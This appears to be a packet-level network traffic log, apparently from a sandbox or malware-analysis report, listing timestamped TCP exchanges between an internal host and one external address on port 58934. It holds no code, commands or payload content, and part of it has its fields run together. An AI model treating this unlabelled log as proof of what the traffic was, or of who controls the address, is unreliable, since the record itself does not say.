Oct 1, 2024 09:29:14.380163908 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380172968 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380181074 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380196095 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380204916 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380213022 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380260944 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380269051 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380275965 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380312920 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380320072 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380327940 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.440813065 CEST  58934  49172  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.445663929 CEST  49177  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.450473070 CEST  58934  49177  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.452578068 CEST  49177  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.460575104 CEST  49177  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.465380907 CEST  58934  49177  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.688505888 CEST  49172  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.983603954 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.988509893 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:15.305747032 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:15.331551075 CEST  49176  58934  192.168.2.22    103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:15.331609011 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:15.336503983 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336585999 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336592913 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336647987 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336656094 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336663008 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336776018 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336783886 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336816072 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.336823940 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341254950 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341321945 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341434002 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341442108 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341448069 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341525078 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341532946 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341536045 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341562986 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341583967 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341592073 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341602087 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.341809034 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.369582891 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.578233957 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.578303099 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:15.661966085 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.666827917 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:15.671669006 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.671722889 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:15.676701069 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:15.997663021 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.003537893 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.294984102 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295000076 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295007944 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295062065 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.295144081 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295154095 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295164108 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295203924 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.295459986 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295470953 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295527935 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.295900106 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295926094 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295937061 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.295970917 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.295970917 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.296062946 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.296771049 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.296816111 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.332515955 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.355159044 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.355206013 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.360013962 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360023022 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360038042 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360044956 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360052109 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360178947 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360187054 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360199928 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360208035 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360416889 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360470057 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360477924 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.360483885 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364759922 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364789963 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364798069 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364823103 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364830971 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364950895 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364958048 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364965916 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364972115 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.364979029 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.524523020 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.524571896 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.524583101 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.524703026 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.524796009 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.524806023 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.524909973 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.524949074 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525046110 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525057077 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525218964 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.525254965 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525264978 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525372982 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.525846004 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525917053 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.525928020 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526025057 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526057959 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.526473999 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526552916 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526563883 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526659966 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.526736975 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526747942 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.526753902 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.526844025 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.527398109 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.527450085 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.527462959 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.527568102 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.527712107 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.987673998 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987715006 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987726927 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987732887 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987740040 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987746000 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987751961 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987759113 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.987843990 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.988048077 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988059998 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988070965 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988080978 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988086939 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988097906 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988102913 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988109112 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988138914 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.988161087 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.988724947 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988735914 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988745928 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988756895 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988766909 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988779068 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988779068 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.988790989 CEST5893449177103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:16.988792896 CEST4917758934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:16.988801956 CEST5893449177103.186.116.99192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 1, 2024 09:29:16.988812923 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.988828897 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.988840103 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.988842010 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.988850117 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.988862991 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.988866091 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.989008904 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.989516020 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989527941 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989537954 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989625931 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.989772081 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989782095 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989793062 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989804029 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.989830971 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990025043 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990036964 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990046978 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990056992 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990068913 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990078926 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990087032 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990087032 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990092039 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990133047 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990556955 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990569115 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990578890 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990587950 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990588903 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990601063 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990607023 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990614891 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990627050 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.990645885 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.990726948 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.992757082 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.992831945 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.992844105 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.992933989 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.992955923 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.992968082 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.992978096 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.992989063 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993005991 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.993280888 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993403912 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993413925 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993424892 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993453026 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.993500948 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.993525982 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993537903 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993550062 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993560076 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993586063 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.993611097 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.993643045 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.994559050 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.994627953 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.994638920 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.994651079 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.994661093 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.994688034 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.994688034 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.995049953 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.997384071 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997476101 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997487068 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997550011 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.997601032 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997611046 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997620106 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997628927 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997657061 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.997699976 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.997757912 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997862101 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997872114 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997976065 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997989893 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.997999907 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:16.998001099 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:16.998047113 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.000529051 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.011635065 CEST  49175        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.016423941 CEST  58934        49175      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224108934 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224155903 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224167109 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224256039 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.224288940 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224302053 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224374056 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.224385023 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224395990 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224503994 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.224572897 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224585056 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224594116 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224605083 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224616051 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.224632978 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.224675894 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.225032091 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225106955 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225116968 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225198030 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.225224018 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225234985 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225290060 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.225541115 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225625992 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225636005 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225713968 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.225749016 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225800991 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225812912 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225822926 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.225830078 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.225846052 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.226104021 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226445913 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226488113 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226499081 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226515055 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.226653099 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226663113 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226674080 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226681948 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.226685047 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.226711988 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.226906061 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227106094 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.227304935 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227351904 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227361917 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227586985 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227616072 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.227629900 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227642059 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227652073 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227679014 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.227755070 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.227833986 CEST  49177        58934      192.168.2.22     103.186.116.99
Oct 1, 2024 09:29:17.228226900 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.228239059 CEST  58934        49177      103.186.116.99   192.168.2.22
Oct 1, 2024 09:29:17.228250027 CEST  58934        49177      103.186.116.99   192.168.2.22
